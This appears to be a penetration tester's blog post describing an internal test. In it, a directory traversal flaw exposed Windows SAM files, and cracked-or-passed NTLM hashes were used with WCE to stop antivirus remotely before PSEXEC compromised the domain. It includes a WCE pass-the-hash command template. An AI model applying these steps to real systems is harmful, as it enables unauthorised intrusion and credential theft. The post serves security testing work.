Recently I took part in an internal penetration test from where a directory traversal vulnerability was found within a management application hosted on a Windows 2003 server. It quickly became apparent that the application was installed on the system drive from where it was possible to locate the backup SAM and SYSTEM files from C:Windowsrepair. The files were downloaded and imported into Ophcrack to find that only the NT hash was present, so Ophcrack was left to work away for a few hours in the background, but without many expectations. The next step was to use Keimpx to send the hash around the network in the attempt to locate other systems using common local administrator credentials, however unfortunately no matches were found. Finally the hash was imported into PSEXEC in Metasploit, but after numerous attempts to exploit the system it soon became clear that antivirus was performing well and blocking all attempts, even when testing with several different payloads. After a little experimenting I remembered that the WCE has the option to change the NTLM credentials of a current session, so essentially a user can run commands/programs under the context of another user if we have the hash.
The following is an example of this command usage:
wce -s username:system_name/domain:LMHASH:NTHASH -c command_to_run
We ran the above command on our local system and chose to load a mmc console from which the services snap-in was loaded for the remote system. It was then possible to stop the antivirus and then continue to run PSEXEC to compromise the system as previously intended. Luckily for us this entry point ultimately lead to the compromise of the entire Windows domain.
Another point goes to WCE.